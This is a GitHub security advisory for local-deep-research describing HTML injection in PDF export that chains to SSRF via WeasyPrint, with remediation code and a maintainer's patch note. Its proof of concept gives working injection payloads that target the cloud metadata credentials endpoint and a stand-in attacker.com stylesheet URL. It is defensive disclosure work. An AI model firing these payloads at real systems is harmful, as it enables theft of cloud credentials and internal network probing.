GHSA-FJ2M-QVH9-JQ4Q

Vulnerability from github – Published: 2026-05-11 19:40 – Updated: 2026-05-11 19:40
VLAI
Summary
local-deep-research is Vulnerable to HTML Injection via Unescaped User Input in PDF Export (`pdf_service.py:_markdown_to_html`)
Details

Summary

PDFService._markdown_to_html() constructs an HTML document by interpolating user-controlled values — specifically title (sourced from research.title or research.query) and metadata key-value pairs — directly into an f-string without any HTML escaping. An authenticated attacker can craft a research query containing HTML special characters to inject arbitrary HTML tags into the document processed by WeasyPrint during PDF export. This injection can be chained to trigger a Server-Side Request Forgery (SSRF), bypassing the application's existing SSRF defenses in ssrf_validator.py.


Details

Vulnerable code: src/local_deep_research/web/services/pdf_service.py, lines 171–176

# pdf_service.py:171-176
if title:
    html_parts.append(f"<title>{title}</title>")   # ← title is not escaped

if metadata:
    for key, value in metadata.items():
        html_parts.append(f'<meta name="{key}" content="{value}">')  # ← key/value are not escaped

Data flow trace:

User input: research.query
        │
        ▼
research_routes.py:1321
  pdf_title = research.title or research.query
        │
        ▼
research_routes.py:1325-1326
  export_report_to_memory(report_content, format, title=pdf_title)
        │
        ▼
pdf_service.py:107
  PDFService.markdown_to_pdf(markdown_content, title=pdf_title)
        │
        ▼
pdf_service.py:137
  _markdown_to_html(markdown_content, title, metadata)
        │
        ▼
pdf_service.py:172
  f"<title>{title}</title>"   ← injection point, no escaping
        │
        ▼
pdf_service.py:112
  HTML(string=html_content)   ← WeasyPrint renders the injected HTML

research.query is a string submitted by the user via POST /api/start_research, stored as-is in the database, and retrieved without any sanitization. When the user triggers POST /api/v1/research/<research_id>/export/pdf, this value is embedded unescaped into the HTML document processed by WeasyPrint.

Injection point 1: <title> tag breakout

Input:    </title><img src="http://169.254.169.254/latest/meta-data/" />
Rendered: <title></title><img src="http://169.254.169.254/latest/meta-data/" /></title>

When WeasyPrint encounters the injected <img> tag, it issues an HTTP GET request to the value of src by default.

Injection point 2: <meta> attribute breakout

Input:    " /><link rel="stylesheet" href="http://attacker.com/evil.css
Rendered: <meta name="..." content="" /><link rel="stylesheet" href="http://attacker.com/evil.css">

WeasyPrint will fetch and apply the external stylesheet, which also constitutes SSRF.


Proof of Concept

Step 1: Log in and submit a research query containing the injection payload

POST /api/start_research HTTP/1.1
Host: localhost:5000
Content-Type: application/json
Cookie: session=<valid_session>

{
  "query": "</title><img src=\"http://169.254.169.254/latest/meta-data/iam/security-credentials/\" onerror=\"x\"/>",
  "mode": "quick",
  "model_provider": "OLLAMA",
  "model": "llama3"
}

The response returns a research_id, e.g. "aaaa-bbbb-cccc-dddd".

Step 2: After the research completes, trigger PDF export

POST /api/v1/research/aaaa-bbbb-cccc-dddd/export/pdf HTTP/1.1
Host: localhost:5000
Cookie: session=<valid_session>
X-CSRFToken: <csrf_token>

Step 3: Intermediate HTML constructed server-side

<!DOCTYPE html><html><head>
<meta charset="utf-8">
<title></title><img src="http://169.254.169.254/latest/meta-data/iam/security-credentials/" onerror="x"/></title>
</head><body>
...report content...
</body></html>

Step 4: WeasyPrint issues an outbound HTTP request to the injected URL

Observed in network monitoring (e.g. tcpdump) or the target internal service logs:

GET /latest/meta-data/iam/security-credentials/ HTTP/1.1
Host: 169.254.169.254
User-Agent: WeasyPrint/...

Lightweight verification (no SSRF environment required):

Set the query to:

</title><title>INJECTED

The resulting HTML will contain two <title> tags and the PDF document metadata title will read INJECTED, confirming successful injection.


Impact

1. Chained SSRF (High Severity)

By injecting <img src>, <link href>, or <style>@import url() tags pointing to internal addresses, WeasyPrint will issue HTTP requests on behalf of the server during PDF generation. This allows access to:

  • Cloud metadata services (169.254.169.254) on AWS, GCP, or Azure — enabling theft of IAM credentials and instance identity documents.
  • Internal network services (192.168.x.x, 10.x.x.x) — enabling reconnaissance and interaction with internal APIs not exposed to the internet.
  • Localhost administrative interfaces — if SSRF protections are only applied at the user-input validation layer.

This is an effective bypass of the application's existing SSRF defenses in ssrf_validator.py, because WeasyPrint's outbound resource requests are never routed through that validator.

2. HTML Document Structure Corruption

Injected tags can prematurely close <head> and insert arbitrary content into <body>, causing WeasyPrint to render incorrectly or crash, resulting in a Denial of Service (DoS) condition for the export functionality.

3. CSS Injection (Medium Severity)

By injecting <link> or <style> tags that load external stylesheets, an attacker can fully control the visual content of the generated PDF, enabling report content forgery or spoofing.

4. Affected Scope

  • All PDF export operations are affected.
  • The vulnerability is reachable by any authenticated user — no elevated privileges required.
  • Because each user operates against their own encrypted database, cross-user exploitation is not possible. However, on any shared or multi-tenant deployment, every authenticated user can independently trigger this vulnerability.

Remediation

Apply html.escape() to all user-controlled values before embedding them in the HTML template inside _markdown_to_html:

import html

if title:
    html_parts.append(f"<title>{html.escape(title)}</title>")

if metadata:
    for key, value in metadata.items():
        html_parts.append(
            f'<meta name="{html.escape(str(key))}" content="{html.escape(str(value))}">'
        )

Additionally, consider configuring WeasyPrint with a custom url_fetcher that blocks or restricts outbound HTTP requests to prevent SSRF via injected or legitimately-embedded external resources:

def safe_url_fetcher(url, timeout=10):
    from ssrf_validator import validate_url
    if not validate_url(url):
        raise ValueError(f"Blocked unsafe URL in PDF rendering: {url}")
    return weasyprint.default_url_fetcher(url, timeout=timeout)

html_doc = HTML(string=html_content, url_fetcher=safe_url_fetcher)

Report generated against commit f3540fb3 — local-deep-research, branch main.


Maintainer note (2026-04-24)

Thanks @Firebasky for the detailed report. The complete remediation spans two PRs, both merged to main:

#3082 (merged 2026-03-29, shipped in v1.5.0+) — closes the HTML-injection sinks: - html.escape() now wraps the title value in <title>…</title> - Same for metadata keys/values in <meta name="…" content="…"> - Regression tests added in tests/web/services/test_pdf_service.py

#3613 (merged 2026-04-24, shipped in v1.6.0) — implements the url_fetcher recommendation from the Remediation section: - New _safe_url_fetcher in pdf_service.py delegates to weasyprint.default_url_fetcher only after security.ssrf_validator.validate_url accepts the URL - Blocks AWS metadata (169.254.169.254), RFC1918, loopback, and non-http(s) schemes - Covers the chained SSRF path through any URL reaching the rendered HTML — markdown body, citations, raw-HTML passthrough via Python-Markdown - Blocked URLs raise UnsafePDFResourceURLError (a ValueError subclass) so WeasyPrint skips the resource and the render continues - 8 regression tests, including an end-to-end render with <img src="http://169.254.169.254/…"> embedded in the body

Advisory metadata: CVSS CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N (5.0 Moderate), CWEs CWE-79 + CWE-918. Patched in v1.6.0 — upgrade to v1.6.0 or later to receive both fixes.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "local-deep-research"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.6.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-43979"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79",
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-11T19:40:07Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "## Summary\n\n`PDFService._markdown_to_html()` constructs an HTML document by interpolating user-controlled values \u2014 specifically `title` (sourced from `research.title` or `research.query`) and `metadata` key-value pairs \u2014 directly into an f-string without any HTML escaping. An authenticated attacker can craft a research query containing HTML special characters to inject arbitrary HTML tags into the document processed by WeasyPrint during PDF export. This injection can be chained to trigger a Server-Side Request Forgery (SSRF), bypassing the application\u0027s existing SSRF defenses in `ssrf_validator.py`.\n\n---\n\n## Details\n\n**Vulnerable code:** `src/local_deep_research/web/services/pdf_service.py`, lines 171\u2013176\n\n```python\n# pdf_service.py:171-176\nif title:\n    html_parts.append(f\"\u003ctitle\u003e{title}\u003c/title\u003e\")   # \u2190 title is not escaped\n\nif metadata:\n    for key, value in metadata.items():\n        html_parts.append(f\u0027\u003cmeta name=\"{key}\" content=\"{value}\"\u003e\u0027)  # \u2190 key/value are not escaped\n```\n\n**Data flow trace:**\n\n```\nUser input: research.query\n        \u2502\n        \u25bc\nresearch_routes.py:1321\n  pdf_title = research.title or research.query\n        \u2502\n        \u25bc\nresearch_routes.py:1325-1326\n  export_report_to_memory(report_content, format, title=pdf_title)\n        \u2502\n        \u25bc\npdf_service.py:107\n  PDFService.markdown_to_pdf(markdown_content, title=pdf_title)\n        \u2502\n        \u25bc\npdf_service.py:137\n  _markdown_to_html(markdown_content, title, metadata)\n        \u2502\n        \u25bc\npdf_service.py:172\n  f\"\u003ctitle\u003e{title}\u003c/title\u003e\"   \u2190 injection point, no escaping\n        \u2502\n        \u25bc\npdf_service.py:112\n  HTML(string=html_content)   \u2190 WeasyPrint renders the injected HTML\n```\n\n`research.query` is a string submitted by the user via `POST /api/start_research`, stored as-is in the database, and retrieved without any sanitization. When the user triggers `POST /api/v1/research/\u003cresearch_id\u003e/export/pdf`, this value is embedded unescaped into the HTML document processed by WeasyPrint.\n\n**Injection point 1: `\u003ctitle\u003e` tag breakout**\n\n```\nInput:    \u003c/title\u003e\u003cimg src=\"http://169.254.169.254/latest/meta-data/\" /\u003e\nRendered: \u003ctitle\u003e\u003c/title\u003e\u003cimg src=\"http://169.254.169.254/latest/meta-data/\" /\u003e\u003c/title\u003e\n```\n\nWhen WeasyPrint encounters the injected `\u003cimg\u003e` tag, it issues an HTTP GET request to the value of `src` by default.\n\n**Injection point 2: `\u003cmeta\u003e` attribute breakout**\n\n```\nInput:    \" /\u003e\u003clink rel=\"stylesheet\" href=\"http://attacker.com/evil.css\nRendered: \u003cmeta name=\"...\" content=\"\" /\u003e\u003clink rel=\"stylesheet\" href=\"http://attacker.com/evil.css\"\u003e\n```\n\nWeasyPrint will fetch and apply the external stylesheet, which also constitutes SSRF.\n\n---\n\n## Proof of Concept\n\n**Step 1: Log in and submit a research query containing the injection payload**\n\n```http\nPOST /api/start_research HTTP/1.1\nHost: localhost:5000\nContent-Type: application/json\nCookie: session=\u003cvalid_session\u003e\n\n{\n  \"query\": \"\u003c/title\u003e\u003cimg src=\\\"http://169.254.169.254/latest/meta-data/iam/security-credentials/\\\" onerror=\\\"x\\\"/\u003e\",\n  \"mode\": \"quick\",\n  \"model_provider\": \"OLLAMA\",\n  \"model\": \"llama3\"\n}\n```\n\nThe response returns a `research_id`, e.g. `\"aaaa-bbbb-cccc-dddd\"`.\n\n**Step 2: After the research completes, trigger PDF export**\n\n```http\nPOST /api/v1/research/aaaa-bbbb-cccc-dddd/export/pdf HTTP/1.1\nHost: localhost:5000\nCookie: session=\u003cvalid_session\u003e\nX-CSRFToken: \u003ccsrf_token\u003e\n```\n\n**Step 3: Intermediate HTML constructed server-side**\n\n```html\n\u003c!DOCTYPE html\u003e\u003chtml\u003e\u003chead\u003e\n\u003cmeta charset=\"utf-8\"\u003e\n\u003ctitle\u003e\u003c/title\u003e\u003cimg src=\"http://169.254.169.254/latest/meta-data/iam/security-credentials/\" onerror=\"x\"/\u003e\u003c/title\u003e\n\u003c/head\u003e\u003cbody\u003e\n...report content...\n\u003c/body\u003e\u003c/html\u003e\n```\n\n**Step 4: WeasyPrint issues an outbound HTTP request to the injected URL**\n\nObserved in network monitoring (e.g. `tcpdump`) or the target internal service logs:\n\n```\nGET /latest/meta-data/iam/security-credentials/ HTTP/1.1\nHost: 169.254.169.254\nUser-Agent: WeasyPrint/...\n```\n\n**Lightweight verification (no SSRF environment required):**\n\nSet the query to:\n\n```\n\u003c/title\u003e\u003ctitle\u003eINJECTED\n```\n\nThe resulting HTML will contain two `\u003ctitle\u003e` tags and the PDF document metadata title will read `INJECTED`, confirming successful injection.\n\n---\n\n## Impact\n\n### 1. Chained SSRF (High Severity)\n\nBy injecting `\u003cimg src\u003e`, `\u003clink href\u003e`, or `\u003cstyle\u003e@import url()` tags pointing to internal addresses, WeasyPrint will issue HTTP requests on behalf of the server during PDF generation. This allows access to:\n\n- **Cloud metadata services** (`169.254.169.254`) on AWS, GCP, or Azure \u2014 enabling theft of IAM credentials and instance identity documents.\n- **Internal network services** (`192.168.x.x`, `10.x.x.x`) \u2014 enabling reconnaissance and interaction with internal APIs not exposed to the internet.\n- **Localhost administrative interfaces** \u2014 if SSRF protections are only applied at the user-input validation layer.\n\nThis is an effective bypass of the application\u0027s existing SSRF defenses in `ssrf_validator.py`, because WeasyPrint\u0027s outbound resource requests are never routed through that validator.\n\n### 2. HTML Document Structure Corruption\n\nInjected tags can prematurely close `\u003chead\u003e` and insert arbitrary content into `\u003cbody\u003e`, causing WeasyPrint to render incorrectly or crash, resulting in a Denial of Service (DoS) condition for the export functionality.\n\n### 3. CSS Injection (Medium Severity)\n\nBy injecting `\u003clink\u003e` or `\u003cstyle\u003e` tags that load external stylesheets, an attacker can fully control the visual content of the generated PDF, enabling report content forgery or spoofing.\n\n### 4. Affected Scope\n\n- All PDF export operations are affected.\n- The vulnerability is reachable by any authenticated user \u2014 no elevated privileges required.\n- Because each user operates against their own encrypted database, cross-user exploitation is not possible. However, on any shared or multi-tenant deployment, every authenticated user can independently trigger this vulnerability.\n---\n\n## Remediation\n\nApply `html.escape()` to all user-controlled values before embedding them in the HTML template inside `_markdown_to_html`:\n\n```python\nimport html\n\nif title:\n    html_parts.append(f\"\u003ctitle\u003e{html.escape(title)}\u003c/title\u003e\")\n\nif metadata:\n    for key, value in metadata.items():\n        html_parts.append(\n            f\u0027\u003cmeta name=\"{html.escape(str(key))}\" content=\"{html.escape(str(value))}\"\u003e\u0027\n        )\n```\n\nAdditionally, consider configuring WeasyPrint with a custom `url_fetcher` that blocks or restricts outbound HTTP requests to prevent SSRF via injected or legitimately-embedded external resources:\n\n```python\ndef safe_url_fetcher(url, timeout=10):\n    from ssrf_validator import validate_url\n    if not validate_url(url):\n        raise ValueError(f\"Blocked unsafe URL in PDF rendering: {url}\")\n    return weasyprint.default_url_fetcher(url, timeout=timeout)\n\nhtml_doc = HTML(string=html_content, url_fetcher=safe_url_fetcher)\n```\n---\n\n*Report generated against commit `f3540fb3` \u2014 local-deep-research, branch `main`.*\n\n\n---\n\n## Maintainer note (2026-04-24)\n\nThanks @Firebasky for the detailed report. The complete remediation spans two PRs, both merged to `main`:\n\n**#3082** (merged 2026-03-29, shipped in **v1.5.0+**) \u2014 closes the HTML-injection sinks:\n- `html.escape()` now wraps the `title` value in `\u003ctitle\u003e\u2026\u003c/title\u003e`\n- Same for metadata keys/values in `\u003cmeta name=\"\u2026\" content=\"\u2026\"\u003e`\n- Regression tests added in `tests/web/services/test_pdf_service.py`\n\n**#3613** (merged 2026-04-24, shipped in **v1.6.0**) \u2014 implements the `url_fetcher` recommendation from the Remediation section:\n- New `_safe_url_fetcher` in `pdf_service.py` delegates to `weasyprint.default_url_fetcher` only after `security.ssrf_validator.validate_url` accepts the URL\n- Blocks AWS metadata (169.254.169.254), RFC1918, loopback, and non-http(s) schemes\n- Covers the chained SSRF path through any URL reaching the rendered HTML \u2014 markdown body, citations, raw-HTML passthrough via Python-Markdown\n- Blocked URLs raise `UnsafePDFResourceURLError` (a `ValueError` subclass) so WeasyPrint skips the resource and the render continues\n- 8 regression tests, including an end-to-end render with `\u003cimg src=\"http://169.254.169.254/\u2026\"\u003e` embedded in the body\n\n**Advisory metadata:** CVSS `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N` (5.0 Moderate), CWEs **CWE-79** + **CWE-918**. **Patched in v1.6.0** \u2014 upgrade to v1.6.0 or later to receive both fixes.",
  "id": "GHSA-fj2m-qvh9-jq4q",
  "modified": "2026-05-11T19:40:07Z",
  "published": "2026-05-11T19:40:07Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/LearningCircuit/local-deep-research/security/advisories/GHSA-fj2m-qvh9-jq4q"
    },
    {
      "type": "WEB",
      "url": "https://github.com/LearningCircuit/local-deep-research/pull/3082"
    },
    {
      "type": "WEB",
      "url": "https://github.com/LearningCircuit/local-deep-research/pull/3613"
    },
    {
      "type": "WEB",
      "url": "https://github.com/LearningCircuit/local-deep-research/commit/0148fa265a3da460c07def7441f9ac49ea61fbcb"
    },
    {
      "type": "WEB",
      "url": "https://github.com/LearningCircuit/local-deep-research/commit/15f13d5c79847f1c38c2dc67bd0027c38af9e34b"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/LearningCircuit/local-deep-research"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "local-deep-research is Vulnerable to HTML Injection via Unescaped User Input in PDF Export (`pdf_service.py:_markdown_to_html`)"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…